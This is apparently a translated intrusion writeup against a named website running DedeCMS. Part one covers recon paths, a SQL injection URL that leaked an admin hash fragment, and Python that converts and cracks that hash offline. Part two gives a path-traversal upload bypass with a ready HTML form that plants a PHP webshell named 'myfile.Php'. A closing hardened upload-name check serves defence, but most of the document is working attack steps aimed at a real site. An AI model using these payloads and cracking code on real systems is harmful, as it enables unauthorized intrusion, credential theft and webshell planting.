① Injection vulnerability

The site: http://www.political-security.com/

First visit the /data/admin/ver.txt page to get the date the system was last upgraded;
www.political-security.com/data/mysql_error_trace.inc leaks the backend (admin) path.
Then visit /member/ajax_membergroup.php?action=post&membergroup=1; as the screenshot shows, the vulnerability is present.
Then add the query.
View the admin account:
http://www.political-security.co ... &membergroup=@`

admin

View the admin password:
http://www.political-security.co ... &membergroup=@`

8d29b1ef9f8c5a5af429
What you get is 20 characters; drop the first three and the last one to get the admin's 16-character MD5:

8d2
9b1ef9f8c5a5af42
9

cmd5 didn't crack it, so I had to try the second method.
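The strip-three-and-one trick above works because of how the hash is stored. As an added Python example (mine, not from the writeup), the block below assumes the DedeCMS admin-table scheme, stored = md5(password)[5:25] (20 hex chars), which makes the "16-character MD5" that cracking sites index, md5(password)[8:24], exactly the stored value with its first three and last character removed. It also runs the recovered value against a constructed wordlist, which is what you would do locally when an online lookup fails.

```python
import hashlib
import re
from typing import Iterable, Optional

HEX20 = re.compile(r"^[0-9a-f]{20}$")


def dede_stored_hash(password: str) -> str:
    """Admin-table form of a password (assumed scheme: chars 5..24 of md5(pwd))."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[5:25]


def md5_16(password: str) -> str:
    """The '16-char MD5' that cmd5-style sites index: chars 8..23 of md5(pwd)."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


def stored_to_md5_16(stored: str) -> str:
    """Drop the first three and the last hex char of the 20-char stored value.

    [5:25] minus three leading and one trailing char is [8:24], i.e. md5_16().
    """
    stored = stored.strip().lower()
    if not HEX20.match(stored):
        raise ValueError("expected 20 hex chars, got %r" % stored)
    return stored[3:19]


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline wordlist attack: compare md5_16 of each candidate with the target."""
    target = stored_to_md5_16(stored)
    for candidate in wordlist:
        if md5_16(candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    # Value from the writeup -> 9b1ef9f8c5a5af42
    print(stored_to_md5_16("8d29b1ef9f8c5a5af429"))
    # Constructed wordlist and a constructed stored hash, to show the round trip
    words = ["password", "admin888", "dedecms"]
    print(crack(dede_stored_hash("admin888"), words))
```

Feed stored_to_md5_16() the value pulled out through the injection and hand the result to a 16-char MD5 lookup or to crack() with a real wordlist; note that cracking the 16-char form recovers the original password, not merely a collision for the stored fragment, because the same password reproduces the full md5.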
② Upload vulnerability:

Just log into the member center, then visit the link
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post

As the screenshot shows, /plus/carbuyaction.php has successfully pulled in the upload page /dialog/select_soft_post.

So rename the PHP one-line webshell's extension to rar or similar and submit it through the form page upload1.htm:

<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file: <input name="uploadfile" type="file" /><br>
newname: <input name="newname" type="text" value="myfile.Php" /><br>
<button class="button2" type="submit">Submit</button>
</form>

Or
and the upload succeeds.
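The form above passes an allowed extension on the uploaded file and then asks for a different name with a mixed-case .Php suffix. The Python below is an added illustration of the check pattern that such a request gets past, written by me and inferred from the steps in the writeup rather than copied from DedeCMS: the uploaded file's extension is validated against an allow-list, but the file is saved under the caller's newname after only a case-sensitive blacklist, so "myfile.Php" is stored and, since Apache's mod_mime matches extensions case-insensitively, executes as PHP. The allow-list and blacklist contents are assumptions. The hardened version beside it decides the final name first, lower-cases and allow-lists its last extension, and generates the base name server-side.

```python
import os
import re
import secrets
from typing import Callable, Optional

# Assumed allow-list of "software" upload types; not DedeCMS's real list.
ALLOWED_UPLOAD_EXTS = {"rar", "zip", "gz", "7z", "exe"}
# Blacklist compiled WITHOUT re.IGNORECASE, so ".Php" is not matched.
FORBIDDEN_CASE_SENSITIVE = re.compile(r"\.(php|php[345]|phtml|asp|aspx|jsp)$")


def _last_ext(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def vulnerable_target_name(uploaded_name: str, newname: Optional[str]) -> str:
    """Model of the bypassed check (assumed logic, not the real source).

    Validates the *uploaded* file's extension, then saves under newname after a
    case-sensitive blacklist: shell.rar + newname=myfile.Php -> myfile.Php.
    """
    if _last_ext(uploaded_name) not in ALLOWED_UPLOAD_EXTS:
        raise ValueError("upload type not allowed: %r" % uploaded_name)
    final = newname or uploaded_name
    if FORBIDDEN_CASE_SENSITIVE.search(final):
        raise ValueError("forbidden extension: %r" % final)
    return final


def hardened_target_name(uploaded_name: str, newname: Optional[str],
                         token: Optional[str] = None) -> str:
    """Check the name that will actually be written, not the one that arrived.

    Strips directories and NUL bytes, takes the last extension, lower-cases it,
    requires it to be on the allow-list, and replaces the base name with a
    server-generated token so no caller-chosen name reaches the filesystem.
    """
    requested = os.path.basename((newname or uploaded_name).replace("\x00", ""))
    ext = _last_ext(requested)
    if ext not in ALLOWED_UPLOAD_EXTS:
        raise ValueError("extension not in allow-list: %r" % requested)
    return "%s.%s" % (token or secrets.token_hex(8), ext)


def rejected(check: Callable[..., str], *args, **kwargs) -> bool:
    """True if the given check refuses the request (helper for the demo)."""
    try:
        check(*args, **kwargs)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The writeup's request: allowed upload extension, mixed-case PHP newname
    print(vulnerable_target_name("shell.rar", "myfile.Php"))       # myfile.Php
    print(rejected(vulnerable_target_name, "shell.rar", "myfile.php"))  # True
    print(rejected(hardened_target_name, "shell.rar", "myfile.Php"))    # True
    print(hardened_target_name("shell.rar", "pack.RAR", token="deadbeef"))  # deadbeef.rar
```

The hardened path also neutralises the other half of the trick: because the stored name is token.ext with a single allow-listed extension, neither a directory component in newname nor a double extension such as x.php.rar survives to disk.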